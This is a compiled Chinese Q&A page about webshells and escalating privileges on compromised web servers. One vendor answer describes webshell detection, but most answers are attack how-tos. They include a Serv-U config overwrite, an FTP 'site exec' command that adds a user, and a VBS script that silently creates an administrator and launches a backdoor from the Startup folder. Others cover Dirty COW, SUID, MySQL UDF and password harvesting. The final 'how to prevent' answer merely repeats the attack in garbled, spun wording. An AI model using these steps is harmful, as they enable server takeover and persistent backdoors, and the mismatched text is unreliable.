Ⅰ 懸鏡中的webshell是如何使用的
WebShell是一種常見的網頁後門,它常常被攻擊者用來獲取Web伺服器的操作許可權。攻擊者在進行網站入侵時,通常會將WebShell文件與Web目錄下的長長網頁文件放置在一起,然後通過瀏覽器訪問WebShell文件,從而獲取命令執行環境,最終達到控制網站伺服器的目的。
當網站伺服器被控制後,就可以在其上任意查看資料庫、上傳下載文件以及執行任意程序命令等。WebShell與正常網頁具有相同的運行環境和服務埠,它與遠程主機通過WWW(80)埠進行數據交換的,一次能夠很容易地避開殺毒軟體的檢測和穿透防火牆。
總體,懸鏡伺服器衛士中WebShell的作用,一方面,WebShell常常被站長用於網站管理、伺服器管理等等,根據FSO許可權的不同,作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。另一方面,被入侵者利用,從而達到控制網站伺服器的目的。
這些網頁腳本常稱為Web腳本木馬,目前比較流行的ASP或php木馬,也有基於.NET的腳本木馬。懸鏡伺服器衛士中系統應用防護中WebShell檢測,所要應對的就是後者。
懸鏡伺服器衛士WebShell有以下5種攻擊方式:
1)首先通過系統前台上傳WebShell腳本到網站伺服器,此時,網站伺服器會向客戶端返回上傳文件的整體URL信息;然後通過URL對這個腳本進行訪問,使其可以執行;最終導致攻擊者能夠在網站的任意目錄中上傳懸鏡伺服器衛士WebShell,從而獲取管理員許可權。
2)攻擊者利用管理員密碼登錄進入後台系統,並藉助後台管理工具向配置文件寫入懸鏡伺服器衛士WebShell,允許任意腳本文件上傳。
3)通過資料庫的備份和恢復功能和獲取WebShell。在資料庫備份時,可以將備份文件的擴展名更改為.asp類型。
4)系統中其他站點遭受攻擊,或者搭載在Web伺服器上的Ftp伺服器遭受攻擊後,被注入了WebShell,這些都會導致整個網站系統被感染。
5) 攻擊者利用Web伺服器漏洞直接對其進行攻擊,從而獲得控制許可權。
WebShell的感染過程描述:
1)攻擊者首先通過SQL注入、跨站腳本攻擊等方式得到上傳許可權,然後將WebShell上傳至伺服器。
2)通過WebShell完成對伺服器的控制,實現植入僵屍木馬、篡改網頁以及獲取敏感信息等惡意功能。
3)植入攻擊木馬,使其作為攻擊「肉雞」對整個網站進行感染。
3.4.1.5linux下WebShell攻擊
WebShell反彈命令行Shell的方式在Linux從操作系統下Web伺服器入侵提權過程中得到了廣泛應用。在Linux下,WebShell可以執行命令,然後溢出卻必須在交互環境中進行,否則即使提權成功,也不能獲得完美利用。
因此,為了完成WebShell攻擊,只需反彈一個Shell命令行窗口,在命令行終端下執行溢出並進行提權。
多數Linux操作系統下的PHP WebShell都通過反彈連接功能獲得一個繼承當前WebShell許可權的Shell命令行窗口。在使用反彈連接功能前,需要首先使用NC工具對一個未使用的埠進行監聽,然後選擇反彈連接方式。
3.4.1.6 WebShell檢測
對於WebShell的檢測,北京安普諾網路安全團隊通過自主研發,設計出一種綜合多種檢測方法的綜合檢測方案。
特徵檢測系統中核心是特徵提取,選取特徵的好壞直接關繫到檢測結果的優劣。因此,在進行特徵選取時,首先應對Web頁面本身進行充分考慮,使得選取的特徵能夠很好地表現出靜態頁面。其次,選取的特徵還應該具有動態特點,可以體現出頁面所進行的操作。
如果提取網頁的全部特徵進行處理,則無法檢測變形的WebShell,也會因為特徵過多而對效率產生影響。如果檢測特徵過少,則有可能產生誤報。通過將多個WebShell庫綜合在一起,同時,又加入公司積累的特徵碼,綜合構建了一個非常強大的WebShell特徵庫,這個特徵庫構成了WebShell檢測的依據。
通過對文件進行特徵庫匹配、文件base64編碼後特徵庫匹配、可疑特徵碼匹配等多種手段進行掃描,從而保證掃描准確性並且降低誤報率。
掃描後,可以具體的提供WebShell的名稱、類型等詳細信息,以供用戶參考。並且針對反饋,用戶還可以有選擇的執行「清理」、「添加信任」等功能,以此實現對WebShell的檢測、發現、處理等操作。
特徵檢測是比較常見的WebShell檢測方法,base64編碼後特徵匹配相對於普通特徵碼檢測的優勢在於匹配的准確性更高誤報率更低。
但是特徵檢測的局限性還是存在的,就是同時降低誤報率和漏報率是很難實現的,所以還需要別的手段對文件進行綜合的檢測。
為此懸鏡伺服器衛士中有Delttime(文件創建時間間隔),Fnum(文件數量閾值)的概念。以特徵屬性、Delttime屬性、Fnum屬性作為Webshell動態檢測演算法的主要3個輸入參數,根據不同參數對檢測結果的影響大小來決定其在演算法中的權重。
實踐證明該演算法檢測效率相對傳統特徵值檢測大幅降低檢測誤報率,有一定的可行性。目前懸鏡伺服器衛士正在申請國家發明專利。與此同時,為了方便用戶使用,軟體給用戶提供「快速掃描」、「自定義掃描」功能。
具體效果,大家可以通過下載使用懸鏡伺服器衛士就知道了。謝謝。希望這個能幫到你。
Ⅱ 黑客專業名詞「提權」,「WEBSHELL」「肉雞」「暴庫」「掛馬」這幾個詞語是什麼意思啊
網路提供
提高自己在伺服器中的許可權,主要針對網站入侵過程中,當入侵某一網站時,通過各種漏洞提升WEBSHELL許可權以奪得該伺服器許可權。
webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了一個網站後,通常會將asp或php後門文件與網站伺服器WEB目錄下正常的網頁文件混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到一個命令執行環境,以達到控制網站伺服器的目的。
肉雞也稱傀儡機,是指可以被黑客遠程式控制制的機器。比如用"灰鴿子"等誘導客戶點擊或者電腦被黑客攻破或用戶電腦有漏洞被種植了木馬,黑客可以隨意操縱它並利用它做任何事情。肉雞通常被用作DDOS攻擊。可以是各種系統,如windows、linux、unix等,更可以是一家公司、企業、學校甚至是政府軍隊的伺服器。
暴庫,就是通過一些技術手段或者程序漏洞得到資料庫的地址,並將數據非法下載到本地。黑客非常樂意於這種工作,為什麼呢?因為黑客在得到網站資料庫後,就能得到網站管理賬號,對網站進行破壞與管理,黑客也能通過資料庫得到網站用戶的隱私信息,甚至得到伺服器的最高許可權。
所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫「備份/恢復」或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。
Ⅲ Linux系統提權相關!
估計沒有什麼用處,因為即使你拿到了管理員許可權,那也只是一個PHP的root許可權。
linux對用戶許可權劃分的很清楚的,當安裝PHP後,會有一個相應的用戶在系統中生成的,就算你成功提權了,可能你會覺得是系統root的許可權,其實是個糖衣炮彈,假的
ps:SSH的漏洞現在已經修復了,而且現在人家用的比較多的也是SSH2,這個的漏洞就更少了,估計提權挺困難的
Ⅳ Linux主機用webshell怎麼提權,有地址...
傳EXP/編譯好的程序
或者各種腳本也行
->
反彈連接
->
運行提權
->
獲得root
->
創建後門
->
內網滲透如社工/sync等滲透
再看看別人怎麼說的。
Ⅳ 拿到WEBSHELL如何提權~
說到花了九牛二虎的力氣獲得了一個webshell,
當然還想繼續獲得整個伺服器的admin許可權,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我來,看看有什麼可以利用的來提升許可權
第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了我們方便,到系統盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地
破解就使用pcanywhere連接就ok了
第二
有很多小黑問我這么把webshell的iis user許可權提升
一般伺服器的管理都是本機設計完畢然後上傳到空間里,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提升許可權
通過servu提升許可權需要servu安裝目錄可寫~
好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,
啟動servu添加了一個用戶,設置為系統管理員,目錄C:\,具有可執行許可權
然後去servu安裝目錄里把ServUDaemon.ini更換伺服器上的。
用我新建的用戶和密碼連接~
好的,還是連上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //剛才添加的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe
文件加用戶。
如果提示沒有許可權,那我們就
把後門(server.exe) 傳他system32目錄
然後寫一個VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存為xx.vbe
這個教本的作用是建立user用戶密碼為pass
並且提升為管理員
然後執行system32目錄下的server.exe
把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
目錄
這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.
第三
就是先檢查有什麼系統服務,或者隨系統啟動自動啟動的程序和管理員經常使用的軟體, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序, 綁定一個批處理或者VBS,然後還是等待伺服器重啟。
第四
查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所
收獲等等。
第五
使用Flashfxp也能提升許可權,但是成功率就看你自己的運氣了
首先找到FlashFXP文件夾,打開(編輯)Sites. dat,這個文件這是什麼東西密碼和用戶名,
而且密碼是
Ⅵ Linux主機用webshell怎麼提權,有地址...
傳EXP/編譯好的程序 或者各種腳本也行 -> 反彈連接 -> 運行提權 -> 獲得root -> 創建後門 -> 內網滲透如社工/sync等滲透
Ⅶ 滲透測試之Linux下提權
直接在kali裡面啟用apache服務
1:在終端輸入「vim /etc/apache2/ports.conf」 -> 鍵盤輸入i 進入插入編輯模式 -> 修改apache2默認監聽埠號為8080 -> 編輯好後,按Esc鍵+「:wq」 保存退出 -> 在終端輸入「/etc/init.d/apache2 start」
2:-> 在瀏覽器地址欄輸入「http://localhost:8080」
直接用kali下的默認web站點 網站環境就不搭建了 直接在網站根目錄下上傳一個大馬 前面挖洞傳webshell就跳過了 直接開始提權
上傳一個大馬上去
先用大馬將臟牛提權利用工具上傳到伺服器上
執行
利用gcc編譯dirty.c文件
再執行./dirty 運行dirty
最下面一行是恢復回原先root賬號密碼的方法
這里就不切換到臟牛創建的用戶了
什麼是suid提權呢?我理解的就是有個文件,它有s標志,並且他輸入root,那麼我們運行這個程序就可以有了root的許可權,並且這個程序還得能執行命令,不然沒什麼用處,那麼我們就能從普通用戶提升到了root許可權了。
首先在本地查找符合條件的文件,有以下三個命令
常用的可用於suid提權的文件
我得Linux系統裡面一個也沒有 這個就過去了 網路也有一些關於SUID提權的文章
Linux提權有很多大牛開發好的提權工具可以參考以下網址
Ⅷ 拿到webshell後如何提權拿下他的伺服器
查看伺服器支持什麼腳本
aspx的腳本許可權要比asp的大
支持aspx , 或者支持命令組件
就去找可寫目錄,..上傳提權工具
再不行的話注冊表找mssql安裝路徑
然後下載3個文件..讀取mssql密碼
這些東西詳細的方法你自己去網路找吧
Ⅸ webshell提權CMD添加用戶無回顯、資料庫是MYSQL、如果是許可權不夠、具體該怎麼做求個詳細教程。
一般windows中,apache下的php默認才具有system許可權,可以直接加用戶,jsp馬的許可權一般也會是system,其他的需要自己提升許可權,mysql可以嘗試找資料庫root密碼,進行udf提權(網路udf提權即可找到),還有就是本地溢出,win下的用pr,烤肉,linux下根據版本在網上找相應的exp,祝你好運
Ⅹ webshell提權 怎麼預防
第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了咱們便利,到體系盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載..cif本地
破解就使用pcanywhere連接就ok了
............................................................................
第二
有良多小黑問我這么把webshell的iis user許可權晉升
普通伺服器的管理都是本機設計結束然後上傳到空間里,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提升許可權
通過servu提升許可權須要servu裝置目錄可寫~
好開始把,首先通過webshell拜訪servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下籠罩,
啟動servu添加了一個用戶,設置為系統管理員,目錄C:,存在可執行許可權
然後去servu安裝目錄里把ServUDaemon.ini調換伺服器上的。